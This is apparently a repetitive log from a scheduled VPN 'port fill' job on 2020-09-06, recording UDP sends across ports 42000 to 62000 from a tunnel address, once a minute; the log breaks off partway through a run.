+Starting port fill at 2020-09-06 09:54:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:54:05 +Starting port fill at 2020-09-06 09:55:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:55:04 +Starting port fill at 2020-09-06 09:56:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:56:06 +Starting port fill at 2020-09-06 09:57:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:57:05 +Starting port fill at 2020-09-06 09:58:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:58:05 +Starting port fill at 2020-09-06 09:59:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:59:04 +Starting port fill at 2020-09-06 10:00:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:00:04 +Starting port fill at 2020-09-06 10:01:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 10:01:06 +Starting port fill at 2020-09-06 10:02:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:02:04 +Starting port fill at 2020-09-06 10:03:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:03:04 +Starting port fill at 2020-09-06 10:04:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:04:04 +Starting port fill at 2020-09-06 10:05:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:05:04 +Starting port fill at 2020-09-06 10:06:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:06:05 +Starting port fill at 2020-09-06 10:07:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:07:05 +Starting port fill at 2020-09-06 10:08:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:08:05 +Starting port fill at 2020-09-06 10:09:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:09:05 +Starting port fill at 2020-09-06 10:10:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:10:06 +Starting port fill at 2020-09-06 10:11:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:11:07 +Starting port fill at 2020-09-06 10:12:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:12:05 +Starting port fill at 2020-09-06 10:13:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:13:04 +Starting port fill at 2020-09-06 10:14:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:14:04 +Starting port fill at 2020-09-06 10:15:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 10:15:06 +Starting port fill at 2020-09-06 10:16:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 